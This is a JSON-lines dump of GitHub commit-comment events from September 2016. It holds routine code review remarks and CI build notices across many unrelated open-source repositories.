{"id":"4609050144","type":"CommitCommentEvent","actor":{"login":"ninhnv-runsystem"},"repo":{"name":"ninhnv-runsystem/developersdatabse"},"payload":{"comment":{"id":19147525,"position":4,"line":50,"path":"src/main/java/com/example/Application.java","commit_id":"a31c50a23afcebb1b5c49f355966cba549ccb958","created_at":"2016-09-23T14:57:26Z","updated_at":"2016-09-23T14:57:26Z","body":"i know should be change like `yeah(){\r\n\r\n}`"}},"created_at":"2016-09-23T14:57:26Z"}
{"id":"4609055660","type":"CommitCommentEvent","actor":{"login":"MSF-Jarvis"},"repo":{"name":"MSF-Jarvis/KPSConnect"},"payload":{"comment":{"id":19147567,"position":null,"line":null,"path":null,"commit_id":"7883a3c1ebbc4c7c212d7d6db78029f62f0e61da","created_at":"2016-09-23T14:58:22Z","updated_at":"2016-09-23T14:58:22Z","body":"Yeah, random error on Jackson. Me not kangey even a line for the past few\nmonths\n\nOn Fri, Sep 23, 2016, 8:27 PM Simao Gomes Viana <notifications@github.com>\nwrote:\n\n> where did u pick that from xD cornowser?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MSF-Jarvis/KPSConnect/commit/7883a3c1ebbc4c7c212d7d6db78029f62f0e61da#commitcomment-19147524>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMuuGjGEstEsTCCkDIMdL4_zMoHvhKGWks5qs-jPgaJpZM4KFEcu>\n> .\n>\n"}},"created_at":"2016-09-23T14:58:22Z"}
{"id":"4609055814","type":"CommitCommentEvent","actor":{"login":"18AdrianoH"},"repo":{"name":"HarkerGameDevelopmentClub/TheGame1617"},"payload":{"comment":{"id":19147569,"position":null,"line":null,"path":null,"commit_id":"ce8ab6354ba01592f3e3545fd5b0b14d339193d9","created_at":"2016-09-23T14:58:24Z","updated_at":"2016-09-23T14:58:24Z","body":"Game should extend application I think."}},"created_at":"2016-09-23T14:58:24Z"}
{"id":"4609056673","type":"CommitCommentEvent","actor":{"login":"jmgordon12"},"repo":{"name":"jmgordon12/hello-world"},"payload":{"comment":{"id":19147571,"position":null,"line":null,"path":null,"commit_id":"5e55702d489b451814063c3a6f4261020512a78b","created_at":"2016-09-23T14:58:33Z","updated_at":"2016-09-23T14:58:33Z","body":"here is a comment on this commit to explain why i made this change"}},"created_at":"2016-09-23T14:58:33Z"}
{"id":"4609057425","type":"CommitCommentEvent","actor":{"login":"xdevs23"},"repo":{"name":"halogenOS/android_build"},"payload":{"comment":{"id":19147573,"position":null,"line":null,"path":null,"commit_id":"945f367b3ab4626d8d205b7806373fe47e969636","created_at":"2016-09-23T14:58:41Z","updated_at":"2016-09-23T14:58:41Z","body":"I cleaned up everything"}},"created_at":"2016-09-23T14:58:41Z"}
{"id":"4609058337","type":"CommitCommentEvent","actor":{"login":"Xeoncross"},"repo":{"name":"Xeoncross/goworkqueue"},"payload":{"comment":{"id":19147580,"position":null,"line":null,"path":null,"commit_id":"58d1d29ae9efa55537f2275bf03b47a1b39ed221","created_at":"2016-09-23T14:58:50Z","updated_at":"2016-09-23T14:58:50Z","body":"In this case I was using Atom on a mac without the go additions. I also use vim and sublime text."}},"created_at":"2016-09-23T14:58:50Z"}
{"id":"4609066317","type":"CommitCommentEvent","actor":{"login":"mikekucera"},"repo":{"name":"BaderLab/AutoAnnotateApp"},"payload":{"comment":{"id":19147603,"position":null,"line":null,"path":null,"commit_id":"6297679206d0026522778ea4914d6114929d4536","created_at":"2016-09-23T15:00:10Z","updated_at":"2016-09-23T15:00:10Z","body":"Fixes #68"}},"created_at":"2016-09-23T15:00:10Z"}
{"id":"4609071782","type":"CommitCommentEvent","actor":{"login":"rpavlik"},"repo":{"name":"OSVR/OSVR-Core"},"payload":{"comment":{"id":19147619,"position":null,"line":null,"path":null,"commit_id":"c08b938af2d04d3ad40772c9db0edbed85937e7a","created_at":"2016-09-23T15:01:05Z","updated_at":"2016-09-23T15:01:05Z","body":"If you're done with this branch, can you either delete it or push it just to a fork on your own account? Trying to cut down on the number of branches in the main official repo."}},"created_at":"2016-09-23T15:01:05Z"}
{"id":"4609072182","type":"CommitCommentEvent","actor":{"login":"williamzh"},"repo":{"name":"Merchello/Merchello"},"payload":{"comment":{"id":19147620,"position":null,"line":null,"path":null,"commit_id":"3a0e91ed36085aee368f85567ba983a2e3adb867","created_at":"2016-09-23T15:01:09Z","updated_at":"2016-09-23T15:01:09Z","body":"This overwrites the entire date string with /. I've created a pull request with a fix."}},"created_at":"2016-09-23T15:01:09Z"}
{"id":"4609073623","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19147624,"position":13,"line":255,"path":"Makefile","commit_id":"a881cb8a641eccf22526e23f3b60b4aafdf03be5","created_at":"2016-09-23T15:01:23Z","updated_at":"2016-09-23T15:01:23Z","body":"Without that `devtable`, your `sudo` binary isn't going to get the `setuid` bit, so it won't work. These block size options are also kind of important to ensure the ext2 driver can read directories (it's pretty bad at it), and 500000 blocks is a very odd size for a hard disk."}},"created_at":"2016-09-23T15:01:23Z"}
{"id":"4609073958","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"sgreenholtz/Event-Spider"},"payload":{"comment":{"id":19147628,"position":null,"line":null,"path":null,"commit_id":"870926d16e6ab94fef88e87680829a9896ffc1ef","created_at":"2016-09-23T15:01:26Z","updated_at":"2016-09-23T15:01:26Z","body":"Good use of logging to track the crud on events."}},"created_at":"2016-09-23T15:01:26Z"}
{"id":"4609075880","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19147634,"position":20,"line":36,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T15:01:46Z","updated_at":"2016-09-23T15:01:46Z","body":"I didn't get why we exclude `super` references here, probably it's worth to have a comment"}},"created_at":"2016-09-23T15:01:46Z"}
{"id":"4609077268","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19147644,"position":null,"line":null,"path":null,"commit_id":"831a841ab19cc503b33a5a3342e08dc14495d1dd","created_at":"2016-09-23T15:02:01Z","updated_at":"2016-09-23T15:02:01Z","body":"These aren't obsolete - they build GCC to run natively **in** the target OS. You probably want to keep them if you want to support having GCC running inside your OS - it's a bit more complicated than other native ports."}},"created_at":"2016-09-23T15:02:01Z"}
{"id":"4609083278","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147657,"position":null,"line":null,"path":null,"commit_id":"9762cdada05f18a0b193f1ab4e9687cb87d924c7","created_at":"2016-09-23T15:03:02Z","updated_at":"2016-09-23T15:03:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1151](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14166&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 252, ignored: 3 Build time: 00:09:51"}},"created_at":"2016-09-23T15:03:02Z"}
{"id":"4609084446","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19147661,"position":5,"line":5,"path":"kernel/acpi/acpi.c","commit_id":"b6f338a5eb392387760585d6c419dafb8645d103","created_at":"2016-09-23T15:03:14Z","updated_at":"2016-09-23T15:03:14Z","body":"If you're going to add files to the kernel that are GPL, you need to license the whole kernel as GPL due to the linking requirements of that license, which is fine (NCSA is forward compatible, you don't even need to hunt down my contributors), but do be careful about that. GPL can be tough to deal with if you're not familiar with all the terms."}},"created_at":"2016-09-23T15:03:14Z"}
{"id":"4609085673","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19147669,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-23T15:03:26Z","updated_at":"2016-09-23T15:03:26Z","body":"iteration (macumber) - i386-Windows-7-VisualStudio-12: OK (2413 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-23T15:03:26Z"}
{"id":"4609086974","type":"CommitCommentEvent","actor":{"login":"onli"},"repo":{"name":"s9y/Serendipity"},"payload":{"comment":{"id":19147675,"position":15,"line":1134,"path":"include/functions.inc.php","commit_id":"c1e4f4c5338be96bc060a05d2a68f8e76012a3b7","created_at":"2016-09-23T15:03:40Z","updated_at":"2016-09-23T15:03:40Z","body":"Is that really the event to send here? 'trackback_send' sounds to me as if that was only meant for sending trackbacks?"}},"created_at":"2016-09-23T15:03:40Z"}
{"id":"4609088114","type":"CommitCommentEvent","actor":{"login":"ShawnieBoy"},"repo":{"name":"magarena/magarena"},"payload":{"comment":{"id":19147679,"position":null,"line":null,"path":null,"commit_id":"dd23352b116f620f5a51561f2f9540abffb6abde","created_at":"2016-09-23T15:03:52Z","updated_at":"2016-09-23T15:03:52Z","body":"Lands don't use the stack (or at least, shouldn't)"}},"created_at":"2016-09-23T15:03:52Z"}
{"id":"4609091168","type":"CommitCommentEvent","actor":{"login":"luiscarabe"},"repo":{"name":"emiliocuestaf/Proyecto-De-Programacion"},"payload":{"comment":{"id":19147691,"position":null,"line":null,"path":null,"commit_id":"bd046c34e32b80fb4c60d59dcf3d30068741a297","created_at":"2016-09-23T15:04:24Z","updated_at":"2016-09-23T15:04:24Z","body":"mis dieses\r\n"}},"created_at":"2016-09-23T15:04:24Z"}
{"id":"4609095789","type":"CommitCommentEvent","actor":{"login":"ptomin"},"repo":{"name":"uxmal/reko"},"payload":{"comment":{"id":19147700,"position":7,"line":48,"path":"subjects/PE-x86/VCExeSample/VCExeSample.c","commit_id":"a4a80c463872735f58ad1f189eaa48ee1674bc80","created_at":"2016-09-23T15:05:14Z","updated_at":"2016-09-23T15:05:14Z","body":"My hack solution is  \tf83dadb"}},"created_at":"2016-09-23T15:05:14Z"}
{"id":"4609098673","type":"CommitCommentEvent","actor":{"login":"simnalamburt"},"repo":{"name":"tokio-rs/tokio-core"},"payload":{"comment":{"id":19147710,"position":null,"line":null,"path":null,"commit_id":"5ab323e5c2cb76c49a3ec8b6d5857b03ebdf28be","created_at":"2016-09-23T15:05:45Z","updated_at":"2016-09-23T15:05:45Z","body":"@dwrensha What happenes if I split the socket without `futures::lazy`?"}},"created_at":"2016-09-23T15:05:45Z"}
{"id":"4609100433","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"sgreenholtz/Event-Spider"},"payload":{"comment":{"id":19147714,"position":null,"line":null,"path":null,"commit_id":"870926d16e6ab94fef88e87680829a9896ffc1ef","created_at":"2016-09-23T15:06:03Z","updated_at":"2016-09-23T15:06:03Z","body":"public boolean addEvent(Map<String, String> map) {  // The work of creating a bean from the map feels like it might be better placed in another class. Maybe the bean itself or a helper class? Thoughts?"}},"created_at":"2016-09-23T15:06:03Z"}
{"id":"4609101312","type":"CommitCommentEvent","actor":{"login":"ikkez"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19147718,"position":null,"line":null,"path":null,"commit_id":"0e2a3e73c0a565568965e9836e1140a22fd4304c","created_at":"2016-09-23T15:06:13Z","updated_at":"2016-09-23T15:06:13Z","body":"Oh well maybe I described it wrong, but this is actually the way I'd like it to be (and I was already using that code in an image tag renderer). It just resizes the image without distorting it.\r\n\r\n```php\r\n$img = new Image('images/wallpaper.jpg'); // 1920x1200\r\n$img->resize(800);\r\n$img->render(); // -> 800 x 500\r\n```\r\nand \r\n```php\r\n$img = new Image('images/wallpaper.jpg'); // 1920x1200\r\n$img->resize(null,800);\r\n$img->render(); // -> 1280 x 800\r\n```\r\n\r\nSo it keeps the proportion of width/height if you only set a width or a height. I think it's not the expected behaviour if you just want all images to be at max width of 800 and you get a cropped image back. Instead the height should be automatic and vise versa.\r\n"}},"created_at":"2016-09-23T15:06:13Z"}
{"id":"4609101332","type":"CommitCommentEvent","actor":{"login":"jtallant"},"repo":{"name":"jtallant/skimpy-engine"},"payload":{"comment":{"id":19147719,"position":14,"line":29,"path":"src/Http/Controller/PutController.php","commit_id":"616d53994a8c90e599552a413070a423c038e41d","created_at":"2016-09-23T15:06:13Z","updated_at":"2016-09-23T15:06:13Z","body":"@caseyamcl how should we handle rendering errors in html and json? Our renderers are configured to render entities in json or html depending on the request content type but we don't have any code to render errors in json. We have one route configured to respond to a 404 and return an HTML response."}},"created_at":"2016-09-23T15:06:13Z"}
{"id":"4609108437","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19147747,"position":null,"line":null,"path":null,"commit_id":"a0861a7d6bbd9c2f43993e1b0f6ddba7d228f300","created_at":"2016-09-23T15:07:24Z","updated_at":"2016-09-23T15:07:24Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1152](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14174&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-23T15:07:24Z"}
{"id":"4609108627","type":"CommitCommentEvent","actor":{"login":"santhoshvai"},"repo":{"name":"AlgorithmCrackers/Interview-Questions"},"payload":{"comment":{"id":19147749,"position":3,"line":3,"path":"00_Arrays/ContainsDuplicate/C++/Makefile","commit_id":"7c561b5ffdc64659492ee40d14b707ca0470581e","created_at":"2016-09-23T15:07:26Z","updated_at":"2016-09-23T15:07:26Z","body":"@prakashn27 just type like below to execute it\r\n\r\n```\r\nmake main && ./main\r\n```\r\n\r\nThis makefile configures the flags to be used by default."}},"created_at":"2016-09-23T15:07:26Z"}
{"id":"4609113869","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19147767,"position":null,"line":null,"path":null,"commit_id":"a980ba88bde61ce6cde648cccb0ae6db7926b841","created_at":"2016-09-23T15:08:21Z","updated_at":"2016-09-23T15:08:21Z","body":"You neglected to update the CD builds for this change, as well as the grub configs for hard disks (though the hard disk build scripts are such massive hacks you probably want to remove them all anyway)."}},"created_at":"2016-09-23T15:08:21Z"}
{"id":"4609114740","type":"CommitCommentEvent","actor":{"login":"M66B"},"repo":{"name":"M66B/BackPackTrackII"},"payload":{"comment":{"id":19147772,"position":null,"line":null,"path":null,"commit_id":"c00c1bce9ecf430350aef2c81a9627b7b28ff419","created_at":"2016-09-23T15:08:30Z","updated_at":"2016-09-23T15:08:30Z","body":"See here for an update: https://github.com/M66B/BackPackTrackII/releases/tag/1.36"}},"created_at":"2016-09-23T15:08:30Z"}
{"id":"4609114837","type":"CommitCommentEvent","actor":{"login":"manaswinipolkampally"},"repo":{"name":"manaswinipolkampally/imad-2016-app"},"payload":{"comment":{"id":19147773,"position":null,"line":null,"path":null,"commit_id":"a5cf6ac96f8a8ad1ef593c0d928307a6fe4490df","created_at":"2016-09-23T15:08:31Z","updated_at":"2016-09-23T15:08:31Z","body":"`hi`"}},"created_at":"2016-09-23T15:08:31Z"}
{"id":"4609117826","type":"CommitCommentEvent","actor":{"login":"wzin"},"repo":{"name":"EndPointCorp/lg_ros_nodes"},"payload":{"comment":{"id":19147776,"position":31,"line":29,"path":"lg_keyboard/src/lg_keyboard/onboard.py","commit_id":"631f274fa4b0fe03fdd31776709039a57d9ca6a5","created_at":"2016-09-23T15:08:51Z","updated_at":"2016-09-23T15:08:51Z","body":"I think we want one node per viewport. How do you kill onboard process for kiosk when you're running on wall?"}},"created_at":"2016-09-23T15:08:51Z"}
{"id":"4609120716","type":"CommitCommentEvent","actor":{"login":"LebedevRI"},"repo":{"name":"darktable-org/darktable"},"payload":{"comment":{"id":19147782,"position":257,"line":1143,"path":"src/common/database.c","commit_id":"5f2d005cc1a7ea7203c03583a40156a76cdada46","created_at":"2016-09-23T15:09:21Z","updated_at":"2016-09-23T15:09:21Z","body":"`_()`"}},"created_at":"2016-09-23T15:09:21Z"}
{"id":"4609121151","type":"CommitCommentEvent","actor":{"login":"wzin"},"repo":{"name":"EndPointCorp/lg_ros_nodes"},"payload":{"comment":{"id":19147784,"position":21,"line":4,"path":"lg_keyboard/scripts/onboard.py","commit_id":"631f274fa4b0fe03fdd31776709039a57d9ca6a5","created_at":"2016-09-23T15:09:26Z","updated_at":"2016-09-23T15:09:26Z","body":"👍 !\r\n"}},"created_at":"2016-09-23T15:09:26Z"}
{"id":"4609128461","type":"CommitCommentEvent","actor":{"login":"lenkis"},"repo":{"name":"tarantool/doc"},"payload":{"comment":{"id":19147834,"position":21,"line":62,"path":"sphinx/book/connectors/__php.rst","commit_id":"def33e71cc369b05d806b15f6af86291b72c7332","created_at":"2016-09-23T15:10:44Z","updated_at":"2016-09-23T15:10:44Z","body":"Eugene, please clarify your idea about different concepts. Which word would\nbe more appropriate here?\n\n\n\nOn Fri, Sep 23, 2016 at 5:51 PM, Eugene Leonovich <notifications@github.com>\nwrote:\n\n> I'm afraid that \"wrapper\" is a wrong word here, as it means completely\n> different concept in the programming world. /cc @nekufa\n> <https://github.com/nekufa>\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tarantool/doc/commit/def33e71cc369b05d806b15f6af86291b72c7332#commitcomment-19147429>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AP7fv2thX9_ALYFb0sdH3woOR1CkGAFJks5qs-d3gaJpZM4KFED->\n> .\n>\n"}},"created_at":"2016-09-23T15:10:44Z"}
{"id":"4609129669","type":"CommitCommentEvent","actor":{"login":"IrynaPoliakova"},"repo":{"name":"IrynaPoliakova/Tasks_EPAM"},"payload":{"comment":{"id":19147838,"position":null,"line":null,"path":null,"commit_id":"21bc67bfa964a6a5d1365c76ea7668bfd6b53303","created_at":"2016-09-23T15:10:57Z","updated_at":"2016-09-23T15:10:57Z","body":"task 7"}},"created_at":"2016-09-23T15:10:57Z"}
{"id":"4609132230","type":"CommitCommentEvent","actor":{"login":"klange"},"repo":{"name":"PoisonNinja/iris"},"payload":{"comment":{"id":19147851,"position":null,"line":null,"path":null,"commit_id":"fd18f1c370f8a2b6f200b77823f68bc72c94070f","created_at":"2016-09-23T15:11:23Z","updated_at":"2016-09-23T15:11:23Z","body":"Be very careful about mass-replacing strings... You've made notable mistakes in the documentation here (particularly URLs)."}},"created_at":"2016-09-23T15:11:23Z"}
{"id":"4609132531","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"apple/swift-package-manager"},"payload":{"comment":{"id":19147852,"position":5,"line":255,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"516fbc30bc7516e8c4a63e58700b99c3f2a9c5cc","created_at":"2016-09-23T15:11:25Z","updated_at":"2016-09-23T15:11:25Z","body":"Cute! Didn't know this one"}},"created_at":"2016-09-23T15:11:25Z"}
{"id":"4609132882","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19147854,"position":20,"line":36,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/ClassifierUsageChecker.kt","commit_id":"6a209a70aeb2316e02ee6ee18aa1f84b859901bc","created_at":"2016-09-23T15:11:29Z","updated_at":"2016-09-23T15:11:29Z","body":"To preserve the old behavior, mostly... Also it doesn't really make sense to report deprecation on `super` in e.g. `super.foo()` if the super class is deprecated. I'll try to explain that in the comment"}},"created_at":"2016-09-23T15:11:29Z"}
{"id":"4609134388","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19147857,"position":null,"line":null,"path":null,"commit_id":"5170b1eceab462336cb0e6197aab11a3ca4d6979","created_at":"2016-09-23T15:11:45Z","updated_at":"2016-09-23T15:11:45Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35999/testReport/) for this commit**"}},"created_at":"2016-09-23T15:11:45Z"}
{"id":"4609137070","type":"CommitCommentEvent","actor":{"login":"adixon"},"repo":{"name":"eileenmcnaughton/com.iatspayments.civicrm"},"payload":{"comment":{"id":19147866,"position":null,"line":null,"path":null,"commit_id":"469c7c14a26c040f4f2bf4b3867553a637b3d68f","created_at":"2016-09-23T15:12:12Z","updated_at":"2016-09-23T15:12:12Z","body":"This patch would no longer work, I think you want to discard it.\r\n1. There's a new front-end form handling case (CRM_Financial_Form_Payment) which won't be amenable to your array_intersect test, so that's not a great shortcut anymore.\r\n2. fname is never empty, so that's not a useful addition."}},"created_at":"2016-09-23T15:12:12Z"}
{"id":"4609138444","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"cordylus/ztools"},"payload":{"comment":{"id":19147869,"position":20,"line":72,"path":"src/main/java/com/bsmanning/ztools/persistence/UserDao.java","commit_id":"dc3af6b7c1ea9bc8e784196e4befb230368851c4","created_at":"2016-09-23T15:12:27Z","updated_at":"2016-09-23T15:12:27Z","body":"I like the check here to look for an existing user, what happens if it does exist already? Message to the user? How does this method communicate that the user already exists?"}},"created_at":"2016-09-23T15:12:27Z"}
{"id":"4609146787","type":"CommitCommentEvent","actor":{"login":"Xophmeister"},"repo":{"name":"wtsi-hgi/hgi-ansible"},"payload":{"comment":{"id":19147885,"position":null,"line":null,"path":null,"commit_id":"36124b8e3bad760a83d40c816e866e77f1f17094","created_at":"2016-09-23T15:13:53Z","updated_at":"2016-09-23T15:13:53Z","body":"n.b., `ansible_python_interpreter` is set as a global group variable (see `group_vars/all`), but shouldn't apply to the Cookie Monster cordon VMs. We can override this in `production_hosts.d/hosts` or with a more specific set of group variables..."}},"created_at":"2016-09-23T15:13:53Z"}
{"id":"4609148156","type":"CommitCommentEvent","actor":{"login":"Warlockbugs"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":19147890,"position":null,"line":null,"path":null,"commit_id":"c1aad1894933199245ce4b45fce62093196947fd","created_at":"2016-09-23T15:14:07Z","updated_at":"2016-09-23T15:14:07Z","body":"The only spell that fits given condition criteria is 19469, but it doesn't have max level set, so the additional level scaling bonus is 0 in that case. Effectively its more of a codebase unification change with possibility to extend to other spells if this is needed, if you are worried if that it will affect vanilla gameplay."}},"created_at":"2016-09-23T15:14:07Z"}
{"id":"4609150740","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19147896,"position":13,"line":223,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"65b87b1d046135630fcc481fd400ef8fce9b2643","created_at":"2016-09-23T15:14:33Z","updated_at":"2016-09-23T15:14:33Z","body":"Copy pasto"}},"created_at":"2016-09-23T15:14:33Z"}
{"id":"4609152441","type":"CommitCommentEvent","actor":{"login":"an0n981"},"repo":{"name":"M66B/BackPackTrackII"},"payload":{"comment":{"id":19147900,"position":null,"line":null,"path":null,"commit_id":"c00c1bce9ecf430350aef2c81a9627b7b28ff419","created_at":"2016-09-23T15:14:52Z","updated_at":"2016-09-23T15:14:52Z","body":"Thanks a lot! I was already preparing a vm with android studio.\nPlease confirm that your banking information if your banking info is still the same. I would like to send a little donation"}},"created_at":"2016-09-23T15:14:52Z"}
{"id":"4609152782","type":"CommitCommentEvent","actor":{"login":"pawaitemadisoncollege"},"repo":{"name":"cordylus/ztools"},"payload":{"comment":{"id":19147902,"position":null,"line":null,"path":null,"commit_id":"dc3af6b7c1ea9bc8e784196e4befb230368851c4","created_at":"2016-09-23T15:14:56Z","updated_at":"2016-09-23T15:14:56Z","body":"Looks like you put some good thought and time into the dao. Nice work."}},"created_at":"2016-09-23T15:14:56Z"}
{"id":"4609153046","type":"CommitCommentEvent","actor":{"login":"longhotsummer"},"repo":{"name":"Code4SA/code4sa.github.io"},"payload":{"comment":{"id":19147903,"position":35,"line":35,"path":"_posts/2016-09-26-media-professionals-about-data-driven-journalism.md","commit_id":"53911abe665502b80092ad52a752c88bf12c0462","created_at":"2016-09-23T15:14:59Z","updated_at":"2016-09-23T15:14:59Z","body":"I think gdrive is more flexible (different download formats, etc.)\r\n\r\nThere's a typo in the link: her -> her**e**"}},"created_at":"2016-09-23T15:14:59Z"}
{"id":"4609153699","type":"CommitCommentEvent","actor":{"login":"whileLooper"},"repo":{"name":"ng-book/angular2-rxjs-chat"},"payload":{"comment":{"id":19147904,"position":null,"line":null,"path":null,"commit_id":"1c678fd81dfe92e0f1088c58fb66273d4e6818cd","created_at":"2016-09-23T15:15:05Z","updated_at":"2016-09-23T15:15:05Z","body":"👍👍"}},"created_at":"2016-09-23T15:15:05Z"}
{"id":"4609156136","type":"CommitCommentEvent","actor":{"login":"nursix"},"repo":{"name":"sahana/eden"},"payload":{"comment":{"id":19147911,"position":5,"line":1042,"path":"modules/s3/s3resource.py","commit_id":"3adc2fb21df191adcaab8a076cbf89f08a5c0876","created_at":"2016-09-23T15:15:27Z","updated_at":"2016-09-23T15:15:27Z","body":"Why always so much negativity whenever I raise an objection?\r\n\r\nThe only reason for anonymous approval is automatic approval - there is really no point in exposing approval in the UI for users who aren't logged in (seriously: this is bare nonsense).\r\n\r\nControlling the user ID for approval was meant to happen via login/s3_impersonate, because that's the only way to actually check permissions for the particular record (realms!). Hence, enforcing that seems like a good idea - which is why this used to fall back to None.\r\n\r\nObviously, automatic back-end approval requires an override - but you can not simply /assume/ that any anonymous call is always a back-end call. There needs to be an indicator, and auth.override seems like the obvious one.\r\n\r\nBut I think, that's not actually what we both want - the only real \"fix\" will be to add user_id to the parameter list of approve(), so that you can indeed override the approver explicitly, as that is what you want.\r\n\r\nThis works for me:\r\n\r\n```\r\ndef approve(self, components=[], approve=True, approved_by=None):\r\n\r\n    auth = current.auth\r\n    if approve:\r\n        if approved_by is None:\r\n            user = auth.user\r\n            if user:\r\n                user_id = user.id\r\n            else:\r\n                return False\r\n        else:\r\n            user_id = approved_by\r\n    else:\r\n        # Reset to unapproved\r\n        user_id = None\r\n```\r\n\r\nNote that this removes the s3_logged_in, because I agree it is up to the caller to trigger the auth challenge, not so low-level.\r\n\r\nThis is the cleanest rule I think: to approve, you either must have a current user, or you must specify the approver explicitly. That seems intuitive to me, and I think rather hard to get it wrong in the caller."}},"created_at":"2016-09-23T15:15:27Z"}
{"id":"4609156967","type":"CommitCommentEvent","actor":{"login":"shahan-mik3"},"repo":{"name":"nitrogen-project/android_vendor_nitrogen"},"payload":{"comment":{"id":19147913,"position":16,"line":64,"path":"products/common.mk","commit_id":"328937199101e42bd543403ec9e6391772bbb2ee","created_at":"2016-09-23T15:15:36Z","updated_at":"2016-09-23T15:15:36Z","body":"I would like to smoke what @xyyx is smokin :p"}},"created_at":"2016-09-23T15:15:36Z"}
{"id":"4609158379","type":"CommitCommentEvent","actor":{"login":"miaekim"},"repo":{"name":"benjioh5/icewall-guideline"},"payload":{"comment":{"id":19147918,"position":null,"line":null,"path":null,"commit_id":"2064497afb83a913dcffc14a98d2e47745e18947","created_at":"2016-09-23T15:15:51Z","updated_at":"2016-09-23T15:15:51Z","body":"* skku.edu\r\n* korea.edu\r\n\r\n...??"}},"created_at":"2016-09-23T15:15:51Z"}
{"id":"4609159649","type":"CommitCommentEvent","actor":{"login":"andreas-roehler"},"repo":{"name":"emacs-berlin/general-close"},"payload":{"comment":{"id":19147922,"position":null,"line":null,"path":null,"commit_id":"4544040b3498d7f734ecce251708cd70089cd63b","created_at":"2016-09-23T15:16:03Z","updated_at":"2016-09-23T15:16:03Z","body":"\n\nOn 23.09.2016 13:24, Jonas Bernoulli wrote:\n>\n> Please consider undoing this. It is not a good idea to bundle only \n> vaguely related libraries in a single repository.\n>\n\nAgreed.\n\n> Instead I would recommend that you move your werkstatt over to github \n> and possibly even split it up,\n>\n\nDone two days ago for the very reasons brought forward here:\nhttps://github.com/andreas-roehler/werkstatt/tree/master/thingatpt-utils-core\n\n\n> and then add the appropriate packages to Melpa\n>\n\nWill do this for that ASAP.\n\n> and adjust the existing package's |Package-Requires| headers \n> accordingly. If you need help with this, then I could provide it, but \n> before putting any work into that, I would first like to know if you \n> are open to the idea - thus this brief protest ;-)\n>\n>\n\nYou are right - thanks for your attention.\n\n\n"}},"created_at":"2016-09-23T15:16:03Z"}
{"id":"4609160991","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19147924,"position":26,"line":296,"path":"Tests/SourceControlTests/GitRepositoryTests.swift","commit_id":"65b87b1d046135630fcc481fd400ef8fce9b2643","created_at":"2016-09-23T15:16:18Z","updated_at":"2016-09-23T15:16:18Z","body":"Maybe silly, but we should probably also test a remote added via command line Git (not our API) shows up."}},"created_at":"2016-09-23T15:16:18Z"}
